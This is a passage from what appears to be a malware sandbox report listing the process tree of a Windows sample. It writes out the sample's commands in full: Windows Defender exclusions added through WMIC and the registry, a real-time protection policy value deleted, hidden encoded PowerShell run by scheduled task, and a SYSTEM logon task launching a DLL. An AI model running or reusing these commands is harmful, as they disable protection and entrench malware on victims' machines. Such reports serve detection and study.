  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:1816
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gueMGYjhW"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2108
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gueMGYjhW"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2180
- C:\Windows\SysWOW64\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
  2⤵
  - Indirect Command Execution
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\SysWOW64\cmd.exe
    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1976
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1916
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:324
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EiageFSkrUtPPHAL" /t REG_DWORD /d 0 /reg:32
  2⤵
  PID:1632
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EiageFSkrUtPPHAL" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2728
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EiageFSkrUtPPHAL" /t REG_DWORD /d 0 /reg:64
  2⤵
  PID:1308
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EiageFSkrUtPPHAL" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2136
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EiageFSkrUtPPHAL" /t REG_DWORD /d 0 /reg:32
  2⤵
  PID:432
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EiageFSkrUtPPHAL" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1144
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EiageFSkrUtPPHAL" /t REG_DWORD /d 0 /reg:64
  2⤵
  PID:2064
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EiageFSkrUtPPHAL" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1600
- C:\Windows\SysWOW64\cmd.exe
  cmd /C copy nul "C:\Windows\Temp\EiageFSkrUtPPHAL\tvTNlaSW\MciAFGQJyjoDpAHv.wsf"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1852
- C:\Windows\SysWOW64\wscript.exe
  wscript "C:\Windows\Temp\EiageFSkrUtPPHAL\tvTNlaSW\MciAFGQJyjoDpAHv.wsf"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1328
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JJyFpTQoRlUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JJyFpTQoRlUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:1772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PcHRTMplLehSqKgCdGR" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:1348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PcHRTMplLehSqKgCdGR" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:1720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WJFamJaEBTfU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WJFamJaEBTfU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2384
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fnPDPsTirKjrC" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2512
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fnPDPsTirKjrC" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wLIvplUSU" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:1592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wLIvplUSU" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:328
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\AjAAYqfCeAnepTVB" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\AjAAYqfCeAnepTVB" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:1568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cXSJtDFScnTzTGgPg" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cXSJtDFScnTzTGgPg" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EiageFSkrUtPPHAL" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2452
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EiageFSkrUtPPHAL" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JJyFpTQoRlUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JJyFpTQoRlUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PcHRTMplLehSqKgCdGR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PcHRTMplLehSqKgCdGR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WJFamJaEBTfU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WJFamJaEBTfU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fnPDPsTirKjrC" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2632
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fnPDPsTirKjrC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wLIvplUSU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wLIvplUSU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\AjAAYqfCeAnepTVB" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2536
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\AjAAYqfCeAnepTVB" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1908
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cXSJtDFScnTzTGgPg" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cXSJtDFScnTzTGgPg" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EiageFSkrUtPPHAL" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EiageFSkrUtPPHAL" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1948
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gtXuTHSiz" /SC once /ST 17:56:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:2000
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gtXuTHSiz"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2932
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gtXuTHSiz"
  2⤵
  PID:1600
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:928
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
  2⤵
  PID:2904
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:2520
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "wTCRKIeCvYDPezrzU"
  2⤵
  PID:2228
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "wTCRKIeCvYDPezrzU"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1708
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "wTCRKIeCvYDPezrzU2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:548
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "wTCRKIeCvYDPezrzU2"
  2⤵
  PID:2260
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "bqQzvWgLjHyenYGOl"
  2⤵
  PID:2612
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bqQzvWgLjHyenYGOl"
  2⤵
  PID:2440
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "bqQzvWgLjHyenYGOl2"
  2⤵
  PID:1284
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bqQzvWgLjHyenYGOl2"
  2⤵
  PID:1940
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gZZJWchISHXYAnojc"
  2⤵
  PID:2504
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gZZJWchISHXYAnojc"
  2⤵
  PID:2524
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gZZJWchISHXYAnojc2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:872
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gZZJWchISHXYAnojc2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:328
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "EeDMFmWmmWXZqwciB"
  2⤵
  PID:1544
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "EeDMFmWmmWXZqwciB"
  2⤵
  PID:1664
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "EeDMFmWmmWXZqwciB2"
  2⤵
  PID:1568
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "EeDMFmWmmWXZqwciB2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2712
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ZICjdOfUYzVbRWNRj"
  2⤵
  PID:2284
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ZICjdOfUYzVbRWNRj"
  2⤵
  PID:2128
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ZICjdOfUYzVbRWNRj2"
  2⤵
  PID:2920
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ZICjdOfUYzVbRWNRj2"
  2⤵
  PID:1928
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "dSmVwYYVQRDtSqHGh"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1952
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "dSmVwYYVQRDtSqHGh"
  2⤵
  PID:2484
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "dSmVwYYVQRDtSqHGh2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2808
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "dSmVwYYVQRDtSqHGh2"
  2⤵
  PID:2976
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "bMkGHBSdQRPgLspLe"
  2⤵
  PID:2732
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bMkGHBSdQRPgLspLe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2856
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "bMkGHBSdQRPgLspLe2"
  2⤵
  PID:2860
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bMkGHBSdQRPgLspLe2"
  2⤵
  PID:2644
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "NIXzKJdQJQyXGLMVNbJ"
  2⤵
  PID:2280
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "NIXzKJdQJQyXGLMVNbJ"
  2⤵
  PID:944
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "NIXzKJdQJQyXGLMVNbJ2"
  2⤵
  PID:664
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "NIXzKJdQJQyXGLMVNbJ2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2020
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "QlDjdRpryfXRXSZehkb"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:316
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "QlDjdRpryfXRXSZehkb"
  2⤵
  PID:2108
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "QlDjdRpryfXRXSZehkb2"
  2⤵
  PID:1492
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "QlDjdRpryfXRXSZehkb2"
  2⤵
  PID:1908
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "RXJhSnxsnUZnjuomqQc"
  2⤵
  PID:1672
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "RXJhSnxsnUZnjuomqQc"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1984
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "RXJhSnxsnUZnjuomqQc2"
  2⤵
  PID:1500
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "RXJhSnxsnUZnjuomqQc2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1360
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "vHDQBHxeiMdAmBLbspa"
  2⤵
  PID:1436
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "vHDQBHxeiMdAmBLbspa"
  2⤵
  PID:2744
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "vHDQBHxeiMdAmBLbspa2"
  2⤵
  PID:2720
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "vHDQBHxeiMdAmBLbspa2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2120
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "kgyACqSLXJcTDCSoDMk"
  2⤵
  PID:2336
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "kgyACqSLXJcTDCSoDMk"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:332
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "kgyACqSLXJcTDCSoDMk2"
  2⤵
  PID:2396
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "kgyACqSLXJcTDCSoDMk2"
  2⤵
  PID:2596
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "YmMYimuQlaimPygSPxM"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2220
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "YmMYimuQlaimPygSPxM"
  2⤵
  PID:1796
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "YmMYimuQlaimPygSPxM2"
  2⤵
  PID:2420
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "YmMYimuQlaimPygSPxM2"
  2⤵
  PID:1080
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "MhGGIHasyeEkcmJHuff"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2056
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "MhGGIHasyeEkcmJHuff"
  2⤵
  PID:1924
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "MhGGIHasyeEkcmJHuff2"
  2⤵
  PID:432
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "MhGGIHasyeEkcmJHuff2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2064
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\wLIvplUSU\nTlAvy.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "thOwFuKJdpsLdjY" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:1852
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "JJVrgEBcjRPEVpY"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2008
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "JJVrgEBcjRPEVpY"
  2⤵
  PID:2516
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "JJVrgEBcjRPEVpY2"
  2⤵
  PID:1772
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "JJVrgEBcjRPEVpY2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1764
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "XFrDvdtkAaVZDJF"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2428
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XFrDvdtkAaVZDJF"
  2⤵
  PID:836
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "XFrDvdtkAaVZDJF2"
  2⤵
  PID:768
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XFrDvdtkAaVZDJF2"
  2⤵
  PID:2460
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "XlKrxptmqxBhcCD"
  2⤵
  PID:2268
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XlKrxptmqxBhcCD"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2404
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "XlKrxptmqxBhcCD2"
  2⤵
  PID:2236
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XlKrxptmqxBhcCD2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2588
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "AGZkPwgTgasPhpl"
  2⤵
  PID:884
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "AGZkPwgTgasPhpl"
  2⤵
  PID:1572
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "AGZkPwgTgasPhpl2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2564
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "AGZkPwgTgasPhpl2"
  2⤵
  PID:948
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "bgOsGbfEyEHheDd"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2356
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bgOsGbfEyEHheDd"
  2⤵
  PID:2740
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "bgOsGbfEyEHheDd2"
  2⤵
  PID:2472
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bgOsGbfEyEHheDd2"
  2⤵
  PID:2736
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "DwLiSZNHuiWjsss"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3008
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "DwLiSZNHuiWjsss"
  2⤵
  PID:2824
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "DwLiSZNHuiWjsss2"
  2⤵
  PID:2816
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "DwLiSZNHuiWjsss2"
  2⤵
  PID:2968
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gMcvWNAhkgXJQi"
  2⤵
  PID:2776
- C:\Windows\SysWOW64\schtasks.exe
